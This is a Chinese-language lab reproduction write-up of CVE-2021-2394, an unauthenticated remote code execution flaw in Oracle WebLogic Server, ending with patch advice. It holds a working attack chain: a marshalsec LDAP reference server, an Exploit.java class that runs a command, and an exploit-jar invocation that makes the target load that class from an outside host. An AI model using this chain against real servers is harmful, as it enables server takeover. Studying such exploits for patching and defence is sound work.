原文链接:Timeline Sec
WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
系统环境:window10系统
weblogic版本:12.2.1.3, 直接官网下载就可以
weblogic安装过程省略,很简单
安装好之后,在此目录启动就可以
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmdweblogic启动成功的截图
1、下载marshalsec利用marshalsec开启JNDI服务
https://github.com/mbechler/marshalsec # 需要自己编译mvn clean package –DskipTestshttps://github.com/RandomRobbieBF/marshalsec-jar # 可以直接使用
2、创建Exploit.java,通过javac编译得到Exploit.class
public class Exploit {static {System.err.println("Pwned");try {String cmds = "calc";Runtime.getRuntime().exec(cmds);} catch ( Exception e ) {e.printStackTrace();}}}
3、在同目录下使用python开启一个http服务,并使用marshalsec开启JNDI服务
python -m http.server 8000java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 8087
4、利用我们组lz2y大佬写的exp进行复现
https://github.com/lz2y/CVE-2021-2394/releases/tag/2.0java -jar CVE_2021_2394.jar 192.168.31.3 7001 ldap://192.168.3.35:8087/Exploit
目标机成功弹框
当前官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。链接如下:
https://www.oracle.com/security-alerts/cpuapr2021.html
参考链接:https://github.com/lz2y/CVE-2021-2394/
https://mp.weixin.qq.com/s/wFHhWvnCLm1xcWZIbv6O3A
侵权请私聊公众号删文
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650520324&idx=2&sn=1d178acc6f36aee30274af1c0684c632&chksm=83badee0b4cd57f6c3511c84b912ee3e8dda6fa410804a830b3f641d3a56aed8155a5da6e0fc#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh